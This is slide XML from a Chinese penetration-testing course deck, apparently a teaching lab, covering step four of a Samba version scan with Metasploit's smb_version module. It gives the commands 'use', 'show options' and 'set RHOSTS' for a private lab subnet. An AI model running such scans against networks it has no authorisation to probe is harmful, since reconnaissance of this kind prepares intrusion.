            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-27 smb_version模块路径2.输入“use auxiliary/scanner/smb/smb_version”命令使用smb_version扫描模块，这个模块能够扫描Samba服务的版本，如图2-4-28所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077460" y="5142865"/>
            <a:ext cx="3752850" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5077460" y="5666740"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-28 使用smb_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Samba服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296535" y="818833"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“show options”命令查看当前模块需要设置的参数，如图2-4-29所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296535" y="1463993"/>
            <a:ext cx="5276850" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296535" y="3416618"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-29 查看模块需要设置的参数4.使用“set RHOSTS 192.168.172.0/24”命令设置扫描目标地址为当前网段，如图2-4-30所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296535" y="4892993"/>
            <a:ext cx="5276850" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296535" y="5359718"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-30 设置模块参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Samba服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤四</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
